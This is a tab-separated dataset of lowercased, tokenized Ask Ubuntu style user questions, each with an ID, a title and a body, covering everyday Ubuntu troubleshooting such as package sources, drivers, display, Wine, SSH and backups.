254369	how to thoroughly remove kde settings ?	so i installed kde to give it a nice go , and while i enjoyed it for those few days , many parts of it annoyed me , therefore i went back to unity . i proceeded to remove kde and all of its apps ( at which i was successful ) i failed at getting rid of its configs . now my firefox looks like it did under kde and so do many of my apps - which is just plain ugly when not used with kde . what should i remove to get rid of that ? i already removed .kde , but that did not help . please re-open this question , it is not a duplicate . i 'm asking how to remove the leftover settings , not the packages . i explained in the comments .
254370	only can type in caps . it acts like the shift key is stuck	its not my keyboard . i have tried multiple keyboards . everything i type is in caps . when i try and click on a line it acts like the shift key is held down and selects stuff . please help
254375	how do you enable pointerbuttons to work on the keyboard ?	let 's assume i have added the following keyboard map in /usr/share/x11/xkb/us . why ca n't use the the keyboard key as a pointer button . partial alphanumeric_keys xkb_symbols `` alt-intl '' { name [ group1 ] = `` english ( us , alternative international ) '' ; include `` us '' key < ab04 > { [ pointer_button1 ] } ; } ;
254378	files missing from my ppa package	summary : uploaded by first attempt at a package to my ppa ; after the launchpad build the package , i found that files are missing from the resulting deb package . my ppa : https : //launchpad.net/~graysky/+archive/utils my package is simply a bash script , config file , init.d scripts/symlinks , and a man page . nothing to compile . how i built it : created the dirtree shown here populating the various dirs with the requisite files ( i.e . /etc , /usr/bin and so on ) . then did the following : cd ~/ppa-src/profile-sync-daemon-5.16 dh_make -- native -- copyright gpl -- single -- email myemail @ myserver.com rm -f debian/* . { ex , ex } < < < edited debian/control and debian/changelog > > debuild -s dput ppa : graysky/utils profile-sync-daemon_5.16_source.changes the files were transferred to launchpad . after launchpad built the package , i extracted the .deb and found that only the /usr dir was included . what am i missing ?
254381	ca n't open `` ubuntu software center '' , `` software updater '' , `` software sources '' , `` language support '' malformed line 56 in source list	i get the following error : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : malformed line 56 in source list /etc/apt/sources.list ( uri parse ) , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened . i know that the problem is the line 56 in source list , but i did all that says in `` how do i remove a malformed line from my sources.list ? '' because it 's a ' [ duplicate ] ' of my first question , but the problem remains even with each proposed solution , what else can i do ? when i type in the terminal gksu gedit /etc/apt/sources.list i get : # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //mx.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http : //mx.archive.ubuntu.com/ubuntu/ quantal main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //mx.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http : //mx.archive.ubuntu.com/ubuntu/ quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //mx.archive.ubuntu.com/ubuntu/ quantal universe deb-src http : //mx.archive.ubuntu.com/ubuntu/ quantal universe deb http : //mx.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http : //mx.archive.ubuntu.com/ubuntu/ quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //mx.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http : //mx.archive.ubuntu.com/ubuntu/ quantal multiverse deb http : //mx.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http : //mx.archive.ubuntu.com/ubuntu/ quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //mx.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //mx.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //security.ubuntu.com/ubuntu quantal-security universe deb-src http : //security.ubuntu.com/ubuntu quantal-security universe deb http : //security.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //security.ubuntu.com/ubuntu quantal-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu quantal main deb-src socio http : //archive.canonical.com/ precisa deb-src http : //extras.ubuntu.com/ubuntu quantal main obviously i must say that i 'm new on this , so i will appreciate your help . and thanks to -eliah kagan- to teach me how to put the 'sources.list ' it was exactly what i wanted to do in first place but i did n't know how to do it , thanks a lot .
254383	while using internet on ubuntu , all other computers get bad internet connection	i am currently using ubuntu 10.04 precise ( in dual boot with windows 7 ) . whenever i log onto ubuntu internet , all other computers internet speeds plummet . usually we have 20 mbps download and 2 upload . however , when i log onto ubuntu i can still get this on this computer but all other computers go to about .5 mbps download and .6 mbps upload . when i log into windows on the same machine the internet works fine on all other computers . my isp is currently time warner . the router is sbg6580 motorla here is my wireless card : 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) subsystem : dell inspiron m5010 / xps 8300 flags : bus master , fast devsel , latency 0 , irq 16 memory at fb200000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 58 ] vendor specific information : len=78 < ? > capabilities : [ 48 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ d0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 13c ] virtual channel capabilities : [ 160 ] device serial number 00-00-3d-ff-ff-70-e4-d5 capabilities : [ 16c ] power budgeting < ? > kernel driver in use : wl kernel modules : wl , bcma , brcmsmac output of ifconfig for wireless : eth1 link encap : ethernet hwaddr e4 : d5:3d:70:81 : b3 inet addr:192.168.0.5 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :e6d5:3dff : fe70:81b3/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:36476 errors:2 dropped:0 overruns:0 frame:9891 tx packets:29153 errors:8 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:43805291 ( 43.8 mb ) tx bytes:6741638 ( 6.7 mb ) interrupt:16 any advice or debugging assistance would be greatly appreciated ! ! ! thanks !
254385	gcc unable to exec gcc.real : no such file or directory	./configure checking for gcc ... gcc checking whether the c compiler works ... no configure : error : in `/home/mob/freeglut-2.8.0 ' : configure : error : c compiler can not create executables see `config.log ' for more details other i.e gcc -- version unable to exec gcc.real : no such file or directory gcc -- version unable to exec gcc.real : no such file or directory
254387	launchpad .net delays in building package	are 4 hour wait times for compilation normal ? is there anything i can do to minimize the lag time ?
254389	dual boot . how do i reinstall the ubuntu partition .	i just got a new netbook and i 'm setting up operative system configuration . it came with windows 7 starter but i installed dual boot ubuntu 12.10 . i did some stuff on the ubuntu version of the system that makes me not want to use it at school . no illegal stuff or porn or anything . basically just writing on a forum about my feelings . nothing extremely advanced , but i 'm just not comfortable with previous searches and stuff popping up while we 're doing groupworks . we do a lot of group work so i will have to solve it . i 'm considering a disc wipe and reinstallation of the ubuntu installation . ubuntu was installed by download an iso from inside windows , then put on an usb drive and rebooted and installed alongside windows . i did not do any fancy configuration about swap spaces or partitions and do not feel i have control over it or understand it . when i start , i get to choose if i want to boot up as windows or ubuntu . it automatically chooses ubuntu . also , i would like to change this so that it chooses windows by default . my question is , is it possible to reinstall ubuntu without having to reinstall windows 7 ? will such a procedure make it `` safe '' to use ubuntu again ? i 'm not interested in a wiping of free disc space or any goverment-level confidentiality . i just want my ubuntu partition cleared , from occasionaly peeping curios eyes in school , not having previously visited websites or previously written documents popping up accidentely . if i remove ubuntu from my hard drive , and then install it again , will a lot of the stuff still be there ? i really would like not to format my hard drive because i have stuff on the windows part of the system that i use . also , what way of unistallation will be good for my needs ? i 've never uninstalled ubuntu before . thanks for your help
254390	document just vanished	i was preparing a text with lyx which i am sure as my name that i saved it on desktop . a few moments later , i decided to put it and some other related .lyx files into folder on desktop . at the moment , the file just vanished . it is not in the folder , nor on the desktop . it does not occur in recent documents in lyx nor in ubuntu menu . what is happening ? ? ?
254398	easy brightness control	i came from linux mint they had a really nice applet for adjusting the brightness . is there something like that , or can it be done by hotkeys or something ? i am on ubuntu 12.10 .
254407	can i install ubuntu from an iso file on windows ?	i 've mounted the iso file using a virtual drive application . when i open the virtual drive with the ubuntu iso mounted , i only have the option of restarting to be able to do anything . however , i could n't boot from the iso after restarting . is it possible to boot from a mounted iso file from the first place ? or do i have to burn the image and boot from the physical cd ?
254408	sierra mc8755 not working with ubuntu 12.10	i have a sierra mc8755 datacard , which came with fujitsu amilo pro v3525 . the card works perfectly under xp , but not under linux . the ttyusb0 - ttyusb2 devices are created , when `` sierra '' driver gets loaded . networkmanager does not see the device . tried to contact the ttyusb ports with putty , no success . all current updates installed , the same for datacard firmware and laptop 's bios . edit : i was just bluetooth-pairing my nokia phone with this laptop , and suddenly the sierra card got recognised . i do not know , if the pairing had anything to do with this.. quite unlikely . looks like my phone got recognised as a mobile broadband device and the system found my sierra card . of course , this might also be due to system updates . next prob.. i created the connection setup with networkmanager . when i try to connect , all i get is a notification that i 'm offline . and the following to /var/log/syslog : feb 18 19:04:32 jki-laptop networkmanager [ 11489 ] : activation ( ttyusb0 ) starting connection 'sonera default' feb 18 19:04:32 jki-laptop networkmanager [ 11489 ] : ( ttyusb0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] feb 18 19:04:32 jki-laptop networkmanager [ 11489 ] : activation ( ttyusb0 ) stage 1 of 5 ( device prepare ) scheduled ... feb 18 19:04:32 jki-laptop networkmanager [ 11489 ] : activation ( ttyusb0 ) stage 1 of 5 ( device prepare ) started ... feb 18 19:04:32 jki-laptop networkmanager [ 11489 ] : activation ( ttyusb0 ) stage 1 of 5 ( device prepare ) complete . feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : ( ttyusb0 ) opening serial port ... feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : ( ttyusb0 ) : port attributes not fully set feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : modem /org/freedesktop/modemmanager/modems/0 : state changed ( disabled - > enabling ) feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : ( ttyusb2 ) opening serial port ... feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : ( ttyusb2 ) : port attributes not fully set feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : ( ttyusb0 ) : failed to query sms mode , assuming text mode feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : ( ttyusb0 ) : failed to enable ussd notifications . feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : modem /org/freedesktop/modemmanager/modems/0 : state changed ( enabling - > disabled ) feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : ( ttyusb0 ) closing serial port ... feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : ( ttyusb0 ) serial port closed feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : mm_serial_port_close : assertion `priv- > open_count > 0 ' failed feb 18 19:04:32 modem-manager [ 4863 ] : last message repeated 5 times feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : ( ttyusb2 ) closing serial port ... feb 18 19:04:32 jki-laptop modem-manager [ 4863 ] : ( ttyusb2 ) serial port closed feb 18 19:04:32 jki-laptop networkmanager [ 11489 ] : gsm modem enable failed : ( 32 ) failed to find a usable modem character set feb 18 19:04:32 jki-laptop networkmanager [ 11489 ] : ( ttyusb0 ) : device state change : prepare - > failed ( reason 'modem-init-failed ' ) [ 40 120 28 ] feb 18 19:04:32 jki-laptop networkmanager [ 11489 ] : marking connection 'sonera default ' invalid . feb 18 19:04:32 jki-laptop networkmanager [ 11489 ] : activation ( ttyusb0 ) failed for connection 'sonera default' feb 18 19:04:32 jki-laptop networkmanager [ 11489 ] : ( ttyusb0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] feb 18 19:04:32 jki-laptop networkmanager [ 11489 ] : ( ttyusb0 ) : deactivating device ( reason 'none ' ) [ 0 ] next , i 'm going to dig into those at commands . but if anyone happens to have a ready solution , i 'd really appreciate it .
254412	how to install ubuntu on a chromebook 3 ?	i read that it 's possible to install ubuntu on a samsung chromebook , but i have a samsung chromebook 3 model code xe303c12-a01uk . could you please tell me where i can get the ubuntu installation details for this model ? if i install ubuntu is this going to make my life easier ?
254414	dell e6430 touchpad stopped working	at some point in the last week , my touchpad stopped working . i say `` some point '' because i normally use a mouse , except once a week , when i use the touchpad . in the settings gui , i no longer even have a touchpad tab . how can i get this working again ? i guess the first step is determining what i have . but i do n't think this command tells me much . do i need to reboot and go into my bios ? buck @ buck-latitude-e6430 ~ ] $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:101d id=6 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_e4hd id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] ↳ dell dell usb keyboard id=7 [ slave keyboard ( 3 ) ] ↳ dell dell usb keyboard id=8 [ slave keyboard ( 3 ) ] [ buck @ buck-latitude-e6430 ~ ] $
254416	how do i find out what credentials i need to run a command ?	whenever i go to use my computer i always get the message `` your computer is running in low graphics mode '' . people have directed me to the terminal to enter a command but i do n't know what my credentials are .
254417	can i set up lirc to enable me to navigate the unity launcher , using my mce remote control , and how would i do this ?	i have mythtv front-end , xbmc and steam linux installed and running fine on my ubuntu 12.04 htpc and would like to be able to control the machine by ir remote control , without having to plug in a keyboard or use another entry device every time i boot up , just to be able to launch my apps . i set up lirc for my mce remote control , using the mythbuntu control panel and tested it successfully with irw . it works fine within the applications mentioned , but i need to be able to use it to launch these applications , too . i have searched around for a solution and come up with very little which helps . even the suggestions on lirc 's homepage ( http : //www.lirc.org/software.html ) are out of date , poorly maintained and/or would not install . i think that these sort of common input methods should be able to be used 'out of the box ' with the new unity interface , so it surprises me that the launcher is n't compatible . anyway , does anybody have any idea how to make this work , or have any other solution to my problem ? thanks , rich .
254420	creating a shortcut to open terminal & run a command	everyone . i 'm new to ubuntu gnome , and i just wanted to know if it 's possible to create a shortcut such as ctrl+1 , and have the terminal popup and run a command such as 'sudo apt-get upgrade ' . is this possible , and if so how can it be done ? thank you !
254421	12.04 : no sound after installing humble bundle games	i 've just installed 12.04.2 on an acer 4830g initially the sound worked fine , but then i installed a bunch of games from the humble indie bundle , and now the sound is all dead . i 've checked the mixer settings and the output volume is not zero . i 've also used the 'test audio ' button in sound settings - it does n't say a thing . i made an alsa-report and i 've looked through it . the problem is i do n't know what to look for . any hints on what to look for ? my alsa report can be seen here : https : //www.dropbox.com/s/jxb6x083l25adap/alsa-info.txt.i89zeh6yld this is its info on my sound card : codec : conexant cx20588 address : 0 afg function id : 0x1 ( unsol 1 ) vendor id : 0x14f1506c subsystem id : 0x1025054f revision id : 0x100002 currently i have no external speaker attached . the laptop has internal speakers that was proven to work earlier .
254424	how can i change what keys on my keyboard do ? ( how can i create custom keyboard commands/shortcuts ? )	i want to change the key bindings on some of the keys on my keyboard . i want some to run commands and others to activate different keys . what applications can i use to do this ? index : xbindkeys default keyboard and shortcut settings ( from within system settings ) xmodmap note : this is an attempt at making a canonical question . please contribute by editing and or answering ! there is a meta post for this here : should we ( do we ? ) have a canonical question for remapping key bindings ? i 'm still looking for answers using xkb , dconf and any other method .
254429	where is `` txt.cfg '' ?	i 'm using lubuntu 12.10 on a usb stick but it is not persistent . instructions on how to make it persistent are in this thread : why is n't persistence working on lubuntu 12.04 live-usb ? but i can find neither a directory syslinux nor a file called txt.cfg or syslinux.cfg ( i have , for example , used the command find / txt.cfg at the $ prompt ) where is the configuration file for lubuntu 12.10 ? : - )
254432	how to fix `` your computer is running in low graphics mode ''	i can get to the terminal from the screen that says `` your computer is running in low graphics mode '' but cant get to my desktop or anything . please help !
254433	youtube scope for unity dash	i just added the scope-youtube from the lens for unity ppa ( atareao/lenses ) along with the yavol needed lens to work with . i can open the yavol config tool to select browser/download/whatever , and the unity lens is there , letting me type and modify usual youtube filters but it retrieves no results . of course , ive logged out/back in and even rebooted but still no luck . has anyone had these issues ? im using ubuntu 12.10 64b . maybe its just a youtube code update that broke the scope ? if someone could check if it works for them id be grateful . its a damn , this scope along with the rottentomatoes and piratebay are the best pair ive ever meet for unity dash , and they are all out of ubuntu official repos .
254436	ubuntu preseed - disable i386/multiarch	i 'm installing servers with pre-seeding but our local mirror only has amd64 packages . yet , installer tries to fetch sources for i386 packages as well and basically strolls on it for a while during installation . i have googled around , read through the preseed docs , but it seems there 's no way to tell it to disable multiarch already during installation . am i blind , or is it really not possible ? thanks !
254440	revert upgrade in ubuntu 12.04	my ubuntu 12.04 did some `` unattended-upgrades '' by itself and increased too much disk space . how can i revert this ?
254443	get files from disk on ubuntu livecd ?	i have a messed up hard drive that , when i boot it , just drops to initramfs . i am a newbie to ubuntu , and i think the hard drive is failing . is there any way to `` take my files and run '' , per say ? like , on a disk or a flash drive , or even just from my livecd ? thanks
254446	how can i change panel font color to white and change background on ubuntu 12.10 ( unity ) ?	i 've been looking for this on 12.10 version , but i just found for 11.10 tutorials . i use radiance theme , and used ubuntu-tweak to make the panel less opacity , but the font is black and now its kind weird . i would like to put this font white and change the background too . i downloaded a image and i do n't know what i have to do . edit : theres is how my panel is now : what should i do ?
254447	how to configure wine for half-life ?	hi , i 've been trying to run half-life 1 on ubuntu 12.10 with wine . the game starts to the menu ok , but when the actual game starts nothing happens . i ca n't move , only my mouse works , and the game is not in full screen . can someone show me how to configure wine to run it ?
254456	php 5.4 . * already comes with xdebug installed ?	ubuntu 12.10 fresh install here . so i just installed php with sudo apt-get install php5 + a few other packages like php5-curl . i executed php -v and noticed something pretty bizarre : php 5.4.6-1ubuntu1.1 ( cli ) ( built : nov 15 2012 01:18:34 ) copyright ( c ) 1997-2012 the php group zend engine v2.4.0 , copyright ( c ) 1998-2012 zend technologies with xdebug v2.2.1 , copyright ( c ) 2002-2012 , by derick rethans notice the xdebug extension installed ? i did not install it through apt ( php5-xdebug package ) , neither through pecl and neither from source ! question . on ubuntu , does php already comes with xdebug now ?
254461	how do i backup my wubi install ? hoping to resize , add new partition , and move away from wubi	my wubi install is near ~22gb , i have an external hard drive with that amount of free space and soooo much more . what i want to do is be able to install everything exactly as it is now , or as close as it is now , with as little hassle as possible , but saving things such as sources , current files in my directors , and possibly even my settings and wms . how would i go about doing this ? also , how would i go about not defaulting to the grub bootloader . i 'd very much prefer to keep what i have now .
254462	amazon downloads - not music	i 'm trying to download my virtual copies of some games from amazon , but the amazon downloader is not compatible with ubuntu i believe . i 've searched for hours , but the only information i find pertains to music . i 've tried pymazon but it works only with music .
254468	wintabber not running with wine on 12.10	i tried to run this with the program from properties and below is what i get from the terminal . i looked around for a fix for it but i do n't really know what to look for . i also tried installing .net framework 2.0 as well , but i ran into quite a bit of errors and i am not sure if it installed properly or not . i really would like to get this software running on here since i ca n't find any other tabbed window managers similar to this one . do any of you know wha adkins526 @ ubuntu : ~ $ env wineprefix= '' /home/zadkins526/.wine '' wine c : \\program\ files\\wintabber\ \ ( freeware\ ) \\wintabber.exe err : module : import_dll library mscoree.dll ( which is needed by l '' c : \\windows\\microsoft.net\\framework\\v2.0.50727\\mscorsvw.exe '' ) not found err : module : ldrinitializethunk main exe initialization for l '' c : \\windows\\microsoft.net\\framework\\v2.0.50727\\mscorsvw.exe '' failed , status c0000135 err : service : service_send_start_message service l '' clr_optimization_v2.0.50727_32 '' failed to start fixme : service : scmdatabase_autostart_services auto-start service l '' clr_optimization_v2.0.50727_32 '' failed to start : 1053 err : module : import_dll library msvbvm60.dll ( which is needed by l '' c : \\program files\\wintabber ( freeware ) \\wintabber.exe '' ) not found err : module : ldrinitializethunk main exe initialization for l '' c : \\program files\\wintabber ( freeware ) \\wintabber.exe '' failed , status c0000135
254473	how to find network active time ?	how to know uptime , downtime with timestamps of all connections of ifconfig . for my case they are three eth0 , wlan0 and ppp0 .
254474	unable to burn iso to disk on osx dvd +r	i keep getting an error when trying to burn the iso to a 4.7 gig memorex dvd +r i have downloaded the iso several times , not the case . i am using disk utility . any suggestions ?
254479	make firefox only use gtk theme on browser chrome , but ignore on websites	i have a dark gtk theme , i do n't want firefox to ignore it all together , i only want the theme to effect firefox 's chrome ( the buttons , address bar , bookmarks bar , etc. , etc . ) , but i want the theme to be ignored by websites , websites should not be themed by the browser ! it 's a sin , and it makes everything look like absolute crap . if anyone has any idea how to fix it , that would be great , thanks ! edit : in the image below , the top panel shows that text entered in the search box is nearly invisible when the `` dark theme '' is applied ; the lower panel shows text clearly visible when the dark theme is n't applied .
254483	installing a dell v313 printer on ubuntu 12.10	i was given a brand new dell v313 printer . is there a driver i can download that will work for this . it said in the reference guide it was compatible with ubuntu 8.10 .
254491	failed to get canonical path of /cow	i am trying to install ubuntu 12.10 for quite some time , and passing hurdles one by one . now i am in a situation as follows . i have got a pc and 10 gb hdd which will be totally dedicated to ubuntu so no option of wubi and dual boot . i was trying to install from dvd , but it is getting stuck at `` out of frequency '' error . so i had to adapt for usb boot option . but my pc is usb non bootable , so workaround is `` plop boot manager '' . so i am doing the installation procedure as follows : starting from a cd drive which is having plop installed . opting for for usb boot in plop options . booting begins from usb . monitor eventually gives `` out of frequency '' error press shift+alt+f1 to get the terminal . open the grub with sudo nano /etc/default/grub . do necessary changes . sudo update-grub . now here i am getting error as follows : /usr/sbin/grub-probe : error : failed to get canonical path of /cow . my system is p4 3.06 ghz , 1 gb ram , 10 gb hdd without an os , monitor crt lg studioworks ( 7 years old ) . mobo mercury p4 266a ndmx ( 865 equivalent ) . the whole system is perfectly in working condition under xp , but it is usb non bootable , and all other devices working perfectly . what should i do next ?
254493	how to change cursor theme	i 've found that changing my cursor theme only really works in applications like firefox ; the cursor is not themed across the os , but remains as the default cursor . i have done some searching and i know that there is a bug that forces the user to create an executable file in order to change their cursor theme . is there really no other way around this ? to be honest , i would think this issue should have been fixed a long time ago . but i digress . i 'm looking for a way other than adding/editing a file in order to do something so basic as change my cursor theme . are there any other options available ?
254498	how do i give my python shell an icon after i lock it to the unity laucher ?	i wanted fast access to my python shell , so i locked it to the launcher , but the icon is just a question mark , which i assume means it does n't have the necessary file . for the sake of aesthetics , i would like to give it one , but i ca n't figure out how to . that is , i do n't know what directory i should put it in , what type it should be ( though i suspect .png ) or what size ( will it resize an oversized image to fit ? or crop ? or just mess up my dock ? ) . edit : grammar
254507	missing panels and menus in gnome 3 after some tweaks and installing different programs	i was doing some tweaks to ubuntu 12.10 and installed some programs , and when i logged into gnome 3.6 the menu was gone . nothing there , just the background . i can still ctrl-alt-t to get terminal or ctrl-alt-delete to log out . i have cairo dock installed , but i installed gnome 3 shell after , and both worked fine . then i did a few tweaks in unity ( enabled hibernate in menu , removed tabbed scrollbars , and few other things ) . i deleted gnome screensaver and installed xscreensaver . i also installed compiz , unity tweak tool , ubuntu tweak tool , and gnome tweak tool . i think that is about all i can think of ... anyway , unity , gnome fallback , and cairo dock all work fine except for gnome 3 .
254508	unattended-upgrades always gives apt-key net-update error	i am running an ubuntu 12.04.2 lts server and i have setup unattended-upgrades to be verbose . now i always see an error from `` apt-key net-update '' . issuing the command manually gives no message at all but the return code is 1 . issuing `` apt-key update '' gives a return code of 0 . what is wrong here ? is there a bug or can i fix this problem ?
254511	how do i setup raid5 on 12.10 server without including system boot disk ( after install ) ?	i have installed ubuntu 12.10 server on my hp microserver . i installed it onto an ssd and now have 4 1tb hdd which i want to configure as raid5 . how do i go about doing this , can i do this from the console or remotely using telnet or is there a gui tool available ? any help would be great , most guides i have found are to do it at os install time ( ie os installed on raid ) or for older versions .
254514	edubuntu : can not login , it just keeps blinking	i just installed a fresh edubuntu 12.04 . it asked me to select which mode to enter . i selected edubuntu `` normal mode '' and after that nothing appeared on the screen , but screen kept on blinking . this continued for 15 minutes . i have amd radeon as graphic card . i can , however , login to edubuntu using recovery mode and pressing `` resume boot '' option . how can i resolve this problem ?
254516	private folder in file server	i have active directory with 400 users . all the users have user accounts but all the pcs are not join the active directory.i want all users who has not join the ad ( can not log in ad ) can have his own folder which it is automaticlly created on file server and nobody can access the folder
254518	pidgin/empathy are not recognizing webcam	i 'm new to ubuntu and am having some issues doing a few things . i 'm trying to video chat on yahoo but am having trouble getting pidgin or empathy to recognize my webcam . i also ca n't figure out how to customize or change the screensavers . any help would be appreciated . thanx to all
254519	movie hd purchasing / rental	does ubuntu 12.10 have the ability to play hd movies rented and or purchased from amazon ? i know there is amazon integration but i do n't want to waste any money without knowing from others how well it works .
254522	what does `` sorry , ubuntu 12.04 has experienced an internal error '' mean ?	sorry , ubuntu 12.04 has experienced an internal error . if you notice further problem , try restarting the computer . send an error report to help fix this problem since i upgraded from 10.01 to 12.04 i get this every time . details are executive path -- -- -- -user/lib/indicator-application/indicator-application-service ... package -- -- -- -- -- -- -- indicator-application0.50-0ubuntu1 problem type -- -- -- -- -crash
254523	dual boot missing ubuntu 12.04 lts , now only windows is directly starting ?	previously i have window7 and ubuntu with dual boot . but now window 7 is directly starting there is no option for ubuntu ( no boot manager ) but i checked via live cd ubuntu partiton ext4 is there and all files also but it directly not starting and windows also not determine that partition or ubuntu boot loader entry ?
254525	why does resume fail ( black screen ) ?	i 've spent a few hours going through similar questions , and found answers ineffective or beyond my comprehension . beginner user . ( 1yr ) suspend began failing after my last update . ( feb 2013 - not sure which - it was a routine bundle suggested by update manager . ) entering suspend mode is successful . when attempting to wake , computer begins running and keyboard backlight comes on , but display remains black . only option is hold power key and shut down . entering password , and combinations of ctrlaltfkey have failed . i dug through through reportingbugs on help.ubuntu.com for a while , but the material is more dense than i can navigate . system info : ubuntu 12.04 lts processor : intel® core™2 duo cpu p8700 @ 2.53ghz × 2 graphics : vesa : nvidia geforce 9400m os type : 32 bit 2009 13 '' macbook pro
254526	how to set up directory backup ?	i have ubuntu 12.10 installed running a lamp stack for a small site i host . i need to set up a system for weekly backups of the /var/www directory where all of my sites are . what is the best possible way of doing this ?
254530	ssh : connect to host 192.168.1.7 port 22 : connection refused	i get this error when ever i try to connect my desktop with another desktop using ssh , but i 'm able to ping the other desktop successfully . ssh : connect to host 192.168.1.7 port 22 : connection refused when i try to restart sshd , it says sshd : unrecognized service i can connect to remote server using ssh but i 'm not able to connect within the local network . please help me in this regards , thanks in advance .
254531	is there any virtualization software which can run x64 bit guest os without vt-x support hardware ?	i have gateway ne56r laptop with intel b960 processor , which do not support virtualization . but i want to install x64 bit guest os on virtualbox , it gives me error . i have also used vmware workstation , parallels workstation . my host os is ubuntu 12.10 x64 bit . please tell me , which virtual software i can use in this situation .
254533	what is vmlinuz.efi.signed ?	installation media for ubuntu 12.10 contain a copy of the kernel named vmlinuz.efi.signed . what is it for , and how is it made ?
254537	how to verify installed os type as minimal virtual machine	trying to install ubuntu 10.04 as guest . press f4 and choose minimal virtual machine and then > selected install ubuntu server now is there a way to confirm that installed machine is minimal vm rather than other normal/minimal after installing it is still showing kernel type as 2.6.32-38-generic-pae
254538	how to remove one file system without removing data on that partition ?	well i 've got two file systems created on my disk , a primary one occupying around 38 gb , and the other one ( which i 'm not using and concerned about ) occupies 450 gb . is there a way around to remove the second one , without removing data or can the two file systems be merged somehow . ubuntu 12.04 please ask for snapshots or if any further information is required , may be i lack some questioning etiquettes , this being my first question here ... thanks .
254552	12.10 wo n't complete update says config.dat is locked by another process	processing triggers for man-db ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing man-db ( -- unpack ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : man-db e : sub-process /usr/bin/dpkg returned an error code ( 1 )
254554	how can i connect to local server ?	i am newbie on ubuntu . so i am trying to learn how to implement some windows style commands in ubuntu . in windows as you know that in order to connect to local server remotely you just need to type in run followed by the name of the server . for example : \n2server how can i connect to a server ( within the same network ) from ubuntu terminal . p.s . i am trying to connect to ftp server .
254555	how to create a personal cloud using eucalyptus ?	i want to implement my own cloud and one of my friend told me that this can be done very easily on ubuntu using eucalyptus . can anyone tell me how ?
254558	customizing ubuntu 's splash screen and welcome text	i 've created my own customized version of ubuntu 12.04 using ubuntu-builder , but now i would like to get rid of the default splash screen and the welcome text related to ubuntu that appear during the boot process and change it to my own customized welcome screen . is this possible ?
254560	compile amd athlon-xp 32 bit kernel in intel 64 bit machine	can someone tell me how to compile linux 3.7 kernel for amd athlon-xp in a 64 bit intel environment through chroot ? i tried setting up a chroot environment but compilation gives me error . thanks to all . p.s : compiling kernel in a virtual machine takes too long .
